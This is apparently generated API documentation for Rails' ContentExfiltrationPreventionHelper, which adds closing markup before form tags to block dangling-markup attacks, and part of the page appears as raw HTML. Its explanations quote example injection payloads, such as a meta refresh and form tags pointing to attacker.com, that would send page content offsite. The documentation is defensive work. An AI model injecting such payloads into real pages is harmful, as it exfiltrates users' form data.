Module: ActionView::Helpers::ContentExfiltrationPreventionHelper

Included in:: ActionView::Helpers, FormTagHelper, UrlHelper

Defined in:: actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb

Constant Summary collapse

CLOSE_QUOTES_COMMENT = Close any open attributes before each form tag. This prevents attackers from injecting partial tags that could leak markup offsite. For example, an attacker might inject: <meta http-equiv="refresh" content='0;URL=https://attacker.com? The HTML following this tag, up until the next single quote would be sent to https://attacker.com. By closing any open attributes, we ensure that form contents are never exfiltrated this way.

%q(<!-- '"` -->).html_safe.freeze

CLOSE_CDATA_COMMENT = Close any open tags that support CDATA (textarea, xmp) before each form tag. This prevents attackers from injecting unclosed tags that could capture form contents. For example, an attacker might inject: <p>The HTML following this tag, up until the next <tt> or the end of the document would be captured by the attacker's </tt>. By closing any open textarea tags, we ensure that form contents are never exfiltrated.</p> </div> </div> <div class="tags"> </div> </dt> <dd><pre class="code"><span class='string val'>""</span><span class='dot token'>.</span><span class='rubyid_html_safe identifier id'>html_safe</span><span class='dot token'>.</span><span class='rubyid_freeze identifier id'>freeze</span> </pre></dd> <dt id="CLOSE_OPTION_TAG-constant" class="">CLOSE_OPTION_TAG = <div class="docstring"> <div class="discussion"> <p>Close any open option tags before each form tag. This prevents attackers from injecting unclosed options that could leak markup offsite.</p> <p>For example, an attacker might inject:</p> <form action="https://attacker.com"><option> <p>The HTML following this tag, up until the next <tt></option></tt> or the end of the document would be captured by the attacker's <tt><option></tt>. By closing any open option tags, we ensure that form contents are never exfiltrated.</p> </div> </div> <div class="tags"> </div> </dt> <dd><pre class="code"><span class='string val'>"</option>"</span><span class='dot token'>.</span><span class='rubyid_html_safe identifier id'>html_safe</span><span class='dot token'>.</span><span class='rubyid_freeze identifier id'>freeze</span> </pre></dd> <dt id="CLOSE_FORM_TAG-constant" class="">CLOSE_FORM_TAG = <div class="docstring"> <div class="discussion"> <p>Close any open form tags before each new form tag. This prevents attackers from injecting unclosed forms that could leak markup offsite.</p> <p>For example, an attacker might inject:</p> <form action="https://attacker.com"> <p>The form elements following this tag, up until the next <tt></form></tt> would be captured by the attacker's <tt><form></tt>. By closing any open form tags, we ensure that form contents are never exfiltrated.</p> </div> </div> <div class="tags"> </div> </dt> <dd><pre class="code"><span class='string val'>"</form>"</span><span class='dot token'>.</span><span class='rubyid_html_safe identifier id'>html_safe</span><span class='dot token'>.</span><span class='rubyid_freeze identifier id'>freeze</span> </pre></dd> <dt id="CONTENT_EXFILTRATION_PREVENTION_MARKUP-constant" class="">CONTENT_EXFILTRATION_PREVENTION_MARKUP = </dt> <dd><pre class="code"><span class='lparen token'>(</span><span class='rubyid_CLOSE_QUOTES_COMMENT constant id'>CLOSE_QUOTES_COMMENT</span> <span class='plus op'>+</span> <span class='rubyid_CLOSE_CDATA_COMMENT constant id'>CLOSE_CDATA_COMMENT</span> <span class='plus op'>+</span> <span class='rubyid_CLOSE_OPTION_TAG constant id'>CLOSE_OPTION_TAG</span> <span class='plus op'>+</span> <span class='rubyid_CLOSE_FORM_TAG constant id'>CLOSE_FORM_TAG</span><span class='rparen token'>)</span><span class='dot token'>.</span><span class='rubyid_freeze identifier id'>freeze</span> </pre></dd> </dl> <h2> Instance Method Summary <small><a href="#" class="summary_toggle">collapse</a></small> </h2> <ul class="summary"> <li class="public "> <span class="summary_signature"> <a href="/docs/rails/ActionView/Helpers/ContentExfiltrationPreventionHelper#prevent_content_exfiltration-instance_method" title="#prevent_content_exfiltration (instance method)">#<strong>prevent_content_exfiltration</strong>(html) ⇒ Object </a> </span> <span class="summary_desc"><div class='inline'></div></span> </li> </ul> <div id="instance_method_details" class="method_details_list"> <h2>Instance Method Details</h2> <div class="method_details first"> <h3 class="signature first" id="prevent_content_exfiltration-instance_method"> #<strong>prevent_content_exfiltration</strong>(html) ⇒ <tt><span class='object_link'><a href="/docs/rails/Object" title="Object (class)">Object</a></span></tt> </h3><script> document.getElementById("prevent_content_exfiltration-instance_method").insertAdjacentHTML( "afterbegin", '<a class="permalink" href="/docs/rails/ActionView%2FHelpers%2FContentExfiltrationPreventionHelper:prevent_content_exfiltration">permalink</a>' ); </script> <table class="source_code"> <tr> <td> <pre class="lines"> 61 62 63 64 65 66 67</pre> </td> <td> <pre class="code"><span class="info file"># File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 61</span> <span class='rubyid_def def kw'>def</span> <span class='rubyid_prevent_content_exfiltration identifier id'>prevent_content_exfiltration</span><span class='lparen token'>(</span><span class='rubyid_html identifier id'>html</span><span class='rparen token'>)</span> <span class='rubyid_if if kw'>if</span> <span class='rubyid_prepend_content_exfiltration_prevention identifier id'>prepend_content_exfiltration_prevention</span> <span class='rubyid_CONTENT_EXFILTRATION_PREVENTION_MARKUP constant id'>CONTENT_EXFILTRATION_PREVENTION_MARKUP</span> <span class='plus op'>+</span> <span class='rubyid_html identifier id'>html</span> <span class='rubyid_else else kw'>else</span> <span class='rubyid_html identifier id'>html</span> <span class='rubyid_end end kw'>end</span> <span class='rubyid_end end kw'>end</span> </pre> </td> </tr> </table> </div> </div> </div> <div id="footer"> Generated on Mon Apr 13 07:58:51 2026 by <a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a> 0.9.40 (ruby-4.0.2). </div> </div> </body> </html> <script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="3605fb024c621ad9451ba21c-|49" defer></script>